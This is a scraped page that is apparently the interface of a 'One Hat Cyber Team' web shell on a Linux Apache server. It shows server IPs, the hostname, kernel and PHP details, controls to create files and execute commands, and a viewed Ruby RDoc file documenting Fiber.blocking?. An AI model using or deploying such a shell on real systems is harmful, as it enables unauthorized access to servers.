⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.25
Server IP:
109.199.105.153
Server:
Linux connect.inboxifs.com 5.15.0-152-generic #162-Ubuntu SMP Wed Jul 23 09:48:42 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.2.29
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
ri
/
3.0.0
/
system
/
Fiber
/
View File Name :
blocking%3f-c.ri
U:RDoc::AnyMethod[iI"blocking?:ETI"Fiber::blocking?;TT:publico:RDoc::Markup::Document:@parts[o:RDoc::Markup::Paragraph; [I";Returns +false+ if the current fiber is non-blocking. ;TI"RFiber is non-blocking if it was created via passing <tt>blocking: false</tt> ;TI")to Fiber.new, or via Fiber.schedule.;To:RDoc::Markup::BlankLine o; ; [I"@If the current Fiber is blocking, the method, unlike usual ;TI"Hpredicate methods, returns a *number* of blocking fibers currently ;TI"running (TBD: always 1?).;T@o; ; [I"NNote, that even if the method returns +false+, Fiber behaves differently ;TI":only if Fiber.scheduler is set in the current thread.;T@o; ; [I"ESee the "Non-blocking fibers" section in class docs for details.;T: @fileI"cont.c;T:0@omit_headings_from_table_of_contents_below0I"(Fiber.blocking? -> false or number ;T0[ I"();T@FI" Fiber;TcRDoc::NormalClass00